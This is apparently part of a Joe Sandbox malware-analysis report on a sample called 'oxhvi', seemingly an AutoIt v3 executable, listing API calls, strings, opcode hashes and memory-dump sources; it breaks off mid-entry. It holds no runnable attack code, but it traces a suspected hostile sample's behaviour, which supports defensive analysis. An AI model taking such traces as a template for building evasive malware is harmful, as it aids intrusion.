  • Part of subcall function 005335AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00533646
  • Part of subcall function 005335AB: LoadIconW.USER32(000000A9), ref: 0053365C
  • Part of subcall function 005335AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0053366B
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 5ec9df910a8497db3ece51df0c6bf1677197b32daa59800b55e35a5f6feb8538
• Instruction ID: 93ddeb74deba45749b6b9bcd89a97715a241da18b68914e400e30ff78e049059
• Opcode Fuzzy Hash: 5ec9df910a8497db3ece51df0c6bf1677197b32daa59800b55e35a5f6feb8538
• Instruction Fuzzy Hash: B1214F70D40315AFDB189FA5EC69B9A7FF6FF48B50F00102AE504E62A0D3B949459F90
APIs
• __Init_thread_footer.LIBCMT ref: 0053CE8E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: p3`$p3`$p3`$p3`$p5`$p5`$x3`$x3`
• API String ID: 1385522511-3694894235
• Opcode ID: 06b52d21b1733dc0cd2bda98e7476d2f8b43570cdfb042fb9573d75d31209603
• Instruction ID: 75fe5248d08402586666cf72566a7b3d6a6437d88d8c186504cf289f0c3f2c28
• Opcode Fuzzy Hash: 06b52d21b1733dc0cd2bda98e7476d2f8b43570cdfb042fb9573d75d31209603
• Instruction Fuzzy Hash: 6C32BB74A002599FDB24DF58C885ABABFBAFF44314F148459EC16BB3A1C774AD42CB90

Control-flow Graph (rendered graph; raw edge list not reproduced)
APIs
  • Part of subcall function 00537953: CloseHandle.KERNELBASE(?,?,00000000,00573A1C), ref: 00537973
  • Part of subcall function 00536E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 00536E80
• SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00533C17
• _wcslen.LIBCMT ref: 00533C96
• SetCurrentDirectoryW.KERNEL32(?), ref: 00533D81
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
• String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 3350465876-3738523708
• Opcode ID: 4631dc62c47b94673bb4f64e9359245ed4d738304aa42dce9d348b608290168b
• Instruction ID: d8b67d96f3a27028e4ba4e421f94329846cbdbfa4e1ddc999298313aca23510f
• Opcode Fuzzy Hash: 4631dc62c47b94673bb4f64e9359245ed4d738304aa42dce9d348b608290168b
• Instruction Fuzzy Hash: 14229B715083429FCB20EF24D895AAFBFE5BFD8314F00491EF589972A1DB709A48DB52
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID:
• String ID: D5`$D5`$D5`$D5`$D5`D5`$Variable must be of type 'Object'.
• API String ID: 0-2757904317
• Opcode ID: a29b0837a798fcb56349b1a542b48beddcd6601bf509f54bf77f2bd917373447
• Instruction ID: 7499026c1cb525cb11f0355d7cc5cd1aecfad9615731db5de66de8cc8d235607
• Opcode Fuzzy Hash: a29b0837a798fcb56349b1a542b48beddcd6601bf509f54bf77f2bd917373447
• Instruction Fuzzy Hash: 28C29971E00216DFCB24DF98C884BAEBBB1FF49304F248569E905AB3A1D771AD45CB91
APIs
• __Init_thread_footer.LIBCMT ref: 005415A2
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: D5`$D5`$D5`$D5`$D5`D5`
• API String ID: 1385522511-3525585743
• Opcode ID: c222207f7a145c6ca96691c81c85d2e9e729109951c38b79bc931ec1a947e9dd
• Instruction ID: e219d0ee68bea963e9606e7788918813e25ec17b6372caa6e6efb0f22ca149b2
• Opcode Fuzzy Hash: c222207f7a145c6ca96691c81c85d2e9e729109951c38b79bc931ec1a947e9dd
• Instruction Fuzzy Hash: 67B29C74A08741CFCB24DF18C484AAABBE1BF85318F24585DEA859B391D771ED85CF82

Control-flow Graph (rendered graph; raw edge list not reproduced)
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00532A9B
• CoUninitialize.COMBASE ref: 00532B3A
• UnregisterHotKey.USER32(?), ref: 00532D1F
• DestroyWindow.USER32(?), ref: 005739F5
• FreeLibrary.KERNEL32(?), ref: 00573A5A
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00573A87
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 0cd079353cc94c3d259ddbbe6418941f57219d2333d55fed402f6b065888bb00
                                                                                                                                                      • Instruction ID: 6ba69774891199057b536ea8cbfa3d42d288fd4eaa1e353da79cf22d6017e9c3
                                                                                                                                                      • Opcode Fuzzy Hash: 0cd079353cc94c3d259ddbbe6418941f57219d2333d55fed402f6b065888bb00
                                                                                                                                                      • Instruction Fuzzy Hash: 34D17C31701612CFCB19EF14D89AB29FFA4BF44710F1485ADE84AAB251CB30AD16EF51

Control-flow Graph (rendered graph for the function starting at 5a874a not reproduced; legend: Executed / Not Executed)
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005A8907
• SetCurrentDirectoryW.KERNELBASE(?), ref: 005A891B
• GetFileAttributesW.KERNEL32(?), ref: 005A8945
• SetFileAttributesW.KERNELBASE(?,00000000), ref: 005A895F
• SetCurrentDirectoryW.KERNEL32(?), ref: 005A8971
• SetCurrentDirectoryW.KERNEL32(?), ref: 005A89BA
• SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 005A8A0A
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: e497121d75abbb744bc4ecdaf2097d6b69f32e6d471dc5f30f38a24f8ea7741b
• Instruction ID: 41a7d5ae5ea76cdee2ba7ad20da5906add570fc3ea65b9997faf85a6593542e4
• Opcode Fuzzy Hash: e497121d75abbb744bc4ecdaf2097d6b69f32e6d471dc5f30f38a24f8ea7741b
• Instruction Fuzzy Hash: B7818C725042029FCB20EE54C484ABEBBE8BB96310F544C2AF885D7251EF39E945CB92

Control-flow Graph

APIs
• Part of subcall function 00533205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00533236
• Part of subcall function 00533205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053323E
• Part of subcall function 00533205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00533249
• Part of subcall function 00533205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00533254
• Part of subcall function 00533205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0053325C
• Part of subcall function 00533205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00533264
• Part of subcall function 0053318C: RegisterWindowMessageW.USER32(00000004,?,00532906), ref: 005331E4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005329AC
• OleInitialize.OLE32 ref: 005329CA
• CloseHandle.KERNEL32(00000000,00000000), ref: 005739E7
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: 0$`$@(`$`$h$$`
• API String ID: 1986988660-4224800786
• Opcode ID: c002a14ec8d2befeebdc18c9ee5d01e4215d4969eac3072c413c727b0d1daab0
• Instruction ID: 96f32d21a2cf1e795159e88175cfede8bad4d8e4a2d62d6652766306997fb6b9
• Opcode Fuzzy Hash: c002a14ec8d2befeebdc18c9ee5d01e4215d4969eac3072c413c727b0d1daab0
• Instruction Fuzzy Hash: 54716CB49912038ED78ADF69ED7D6173FE2BF88304B50A12E9509C72A1EB704449CF59
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4288abb05aad6469767b8be971dfe6e4df832adc452ba7bf3dac88a4641a7cd8
• Instruction ID: e854c6a224681387a678ffc71570b00bcd1e7dc08b4cb05f8c24e036a2700d72
• Opcode Fuzzy Hash: 4288abb05aad6469767b8be971dfe6e4df832adc452ba7bf3dac88a4641a7cd8
• Instruction Fuzzy Hash: A4C1E670E0438A9FDF11DFA8C845BADBFB9BF5A310F144599E814AB392D7309942CB61
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00533568
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00533589
• ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 0053359D
• ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 005335A6
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 9478564f332c9d2f3470ed6b06fe5860801b902c3832c82a4194f9d073758102
• Instruction ID: 7451804538bf998c2b7a09251a8c49a16aba4b0b3aee6d76cbe9ad4290aa92c1
• Opcode Fuzzy Hash: 9478564f332c9d2f3470ed6b06fe5860801b902c3832c82a4194f9d073758102
• Instruction Fuzzy Hash: 48F0B7716803967EEB2557176C1CF372FBEEBC6F50B00202EB904E6160D6A91855EAB0
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053561C
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053563D
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005355EB,SwapMouseButtons,00000004,?), ref: 0053565F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: cb6af3578c3cc2e43bdf2e98e3944ddf48112d59270bd946f62ec4cb3f524442
• Instruction ID: 7f5941a23f3227c50c18186d014bc7cac32cc5bcf5224eb89a7a1973efb2b919
• Opcode Fuzzy Hash: cb6af3578c3cc2e43bdf2e98e3944ddf48112d59270bd946f62ec4cb3f524442
• Instruction Fuzzy Hash: 3F113C75611608BFDB208F68CC45EEFBBB8FF14744F505869F805E7120E671AE45A760
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0058E73D
• FreeLibrary.KERNEL32 ref: 0058E763
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
• Opcode ID: 437b9467baad827697a0409b5d164ac37fe1bf3c1312c9774ef500e9d2bc6e0b
• Instruction ID: c3ed55c6ee215b373dd00b483507f0d4d139c77732abef3198ecff8ff7ca2a40
• Opcode Fuzzy Hash: 437b9467baad827697a0409b5d164ac37fe1bf3c1312c9774ef500e9d2bc6e0b
• Instruction Fuzzy Hash: C2E0E5319016119FDF762A105C49EFA3E34BF20701B180868EC01F6150EB24CC48C398
APIs
• GetFileAttributesW.KERNELBASE(?,005CDC30), ref: 0059DABB
• GetLastError.KERNEL32 ref: 0059DACA
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 0059DAD9
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005CDC30), ref: 0059DB36
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 0983bf19c5f1b0acb5d083ace8585cabfc0737d626aa7b476ecdfc3f2fee7b57
• Instruction ID: 3cea35516e4ee1a79e94c06b8e38085903af76d301027807d6de02a2a7a45a52
• Opcode Fuzzy Hash: 0983bf19c5f1b0acb5d083ace8585cabfc0737d626aa7b476ecdfc3f2fee7b57
• Instruction Fuzzy Hash: C02171745092059F8B10DF24C8859ABBBF4FE95364F144A1DF499C72A1D730DD4ACF62
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00574115
  • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
  • Part of subcall function 005339DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005339FD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X$`u_
• API String ID: 779396738-5915016
• Opcode ID: 0e51b311500ed54309e359e06eb1eb2762cd42d27a445e827982ee66633318b2
• Instruction ID: ba831eaa8ef778a0e2e3785dc3963106e17dbe73268a92a411953775f0787038
• Opcode Fuzzy Hash: 0e51b311500ed54309e359e06eb1eb2762cd42d27a445e827982ee66633318b2
• Instruction Fuzzy Hash: 73218471A0425D9BCF05DF98D849BEE7FF9BF89304F008019E505E7241DBB85A898FA1
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 005509F8
  • Part of subcall function 00553634: RaiseException.KERNEL32(?,?,?,00550A1A,?,00000000,?,?,?,?,?,?,00550A1A,00000000,005F9758,00000000), ref: 00553694
• __CxxThrowException@8.LIBVCRUNTIME ref: 00550A15
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: b259a5c924d2cb9aa4a1ec85dc5542b064a9df58ffaabfc743f708ea45f83d9c
• Instruction ID: 86561a9db97b7fdb2f08f3e5b1d660706ec2bf12ee146df3cea56cddf52c22d1
• Opcode Fuzzy Hash: b259a5c924d2cb9aa4a1ec85dc5542b064a9df58ffaabfc743f708ea45f83d9c
• Instruction Fuzzy Hash: 68F0A43450070E778B05BAA4DC7A9AD7F7CBE40351B605127BD14974E2EB70DA5EC5C1
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 3a2933e01cff76258eb3b33b39d70c7d30702dda174a7dff0463104e5dec0071
• Instruction ID: 58b4370a5684375fde7f7ef65f9b8550e84287f921a6f80f847c0bf06e2b0f60
• Opcode Fuzzy Hash: 3a2933e01cff76258eb3b33b39d70c7d30702dda174a7dff0463104e5dec0071
• Instruction Fuzzy Hash: 18D012B1C0401DD9CF90BA909C4ACBD7B7CBB18305F104C62FD06F1040F6349508A721
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005B8C52
• TerminateProcess.KERNEL32(00000000), ref: 005B8C59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 005B8E3A
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 65aea404124697feb1023e39ad849d2a00593889dea3f2c0d9222ebff1465bd8
• Instruction ID: cc1f64f1958a9222c20032d2db585efc0a0af423ef67c11bdb9323f8bdac6e1b
• Opcode Fuzzy Hash: 65aea404124697feb1023e39ad849d2a00593889dea3f2c0d9222ebff1465bd8
• Instruction Fuzzy Hash: B1125971A083419FC714DF28C485B6ABBE9FF89314F14895DE8898B392DB31ED45CB92
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00536CA1
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00536CB1
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 44d3390101d35dfd9702b5ebe47a52dbd9f9a9b40338010b1c9bf7b8fcc5670e
• Instruction ID: 513ddd8e8edbf7f7ad10548b790211a56342b42d855d4034b43be3675acc9c8c
• Opcode Fuzzy Hash: 44d3390101d35dfd9702b5ebe47a52dbd9f9a9b40338010b1c9bf7b8fcc5670e
• Instruction Fuzzy Hash: 7B314C71A0060AFFDB14CF68C980B99BBB5FB44314F14C629E91997240D7B1FEA4DB90
APIs
  • Part of subcall function 00535F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00536049
• KillTimer.USER32(?,00000001,?,?), ref: 0054FD44
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0054FD53
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0058FDD3
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
